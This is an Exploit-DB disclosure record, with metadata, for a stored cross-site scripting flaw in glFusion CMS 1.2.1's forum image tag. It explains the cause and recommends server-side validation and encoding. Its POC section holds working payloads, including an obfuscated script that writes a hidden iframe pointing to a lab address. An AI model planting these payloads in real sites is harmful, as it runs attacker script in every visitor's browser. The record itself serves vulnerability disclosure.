ID EDB-ID:15995 Type exploitdb Reporter Saif Modified 2011-01-15T00:00:00
Description
# Exploit Title: glfusion CMS 1.2.1 stored XSS via img tag
# Date: 14-1-2010
# Author: Saif El-Sherei
# Software Link:
www.glfusion.org/filemgmt/viewcat.php?cid=1<http://php.opensourcecms.com/scripts/redirect/download.php?id=33>
# Version: 1.2.1
# Tested on: Firefox 3.0.15
Info:
glFusion <http://www.glfusion.org/> gives you the ability to easily create
websites and online communities complete with add-ons like Forums,
CAPTCHA/Spam filters, Calendars, File & Media Gallery management solutions,
WYSIWYG editors, and MooTools AJAX support, all right out of the box.
Details:
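Failure to sanitize the BBcode image tag in forum posts allows an attacker
to perform stored XSS attacks. As the POCs below show, a ">" placed in the
tag's w (width) parameter appears to close the generated image element, so
the markup that follows it is rendered as HTML for every user who views the
post. Also note that a literal "src" attribute cannot be injected in the
attack, so the second POC builds its markup with String.fromCharCode
instead (it decodes to a zero-size iframe pointing at a private lab
address). The fix belongs on the server side: accept only integers for the
w and h parameters, and HTML-encode every BBcode parameter before it is
written into the page.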
POC:
[img w=30><script>alert(123);</script> h=30]images/help.png[/img]
[img
w=30><script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,51,49,46,49,50,56,58,56,48,56,48,47,34,32,104,101,105,103,104,116,61,34,48,34,32,119,105,100,116,104,61,34,48,34,62));</script>
h=30]x[/img]
Regards,
Saif El-Sherei
OSCP
{"id": "EDB-ID:15995", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting", "description": "", "published": "2011-01-15T00:00:00", "modified": "2011-01-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/15995", "reporter": "Saif", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T06:48:26", "viewCount": 9, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://www.exploit-db.com/download/15995", "sourceData": "# Exploit Title: glfusion CMS 1.2.1 stored XSS via img tag\r\n# Date: 14-1-2010\r\n# Author: Saif El-Sherei\r\n# Software Link:\r\nwww.glfusion.org/filemgmt/viewcat.php?cid=1<http://php.opensourcecms.com/scripts/redirect/download.php?id=33>\r\n# Version: 1.2.1\r\n# Tested on: Firefox 3.0.15\r\n\r\nInfo:\r\n*\r\nglFusion <http://www.glfusion.org/>* gives you the ability to easily create\r\nwebsites and online communities complete with add-ons like Forums,\r\nCAPTCHA/Spam filters, Calendars, File & Media Gallery management solutions,\r\nWYSIWYG editors, and MooTools AJAX support, all right out of the box.\r\n\r\n\r\nDetails:\r\n\r\nFailure to sanitize the BBcode image tags in the forum posts allows attacker\r\nto perform XSS attacks. 
also noted that u can't inject any \"src\" attribute\r\nin the attack so we use the second POC.\r\n\r\n\r\nPOC:\r\n\r\n[img w=30><script>alert(123);</script> h=30]images/help.png[/img]\r\n\r\n[img\r\nw=30><script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,51,49,46,49,50,56,58,56,48,56,48,47,34,32,104,101,105,103,104,116,61,34,48,34,32,119,105,100,116,104,61,34,48,34,62));</script>\r\nh=30]x[/img]\r\n\r\nRegards,\r\n\r\nSaif El-Sherei\r\n\r\nOSCP", "osvdbidlist": ["72073"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645376246}}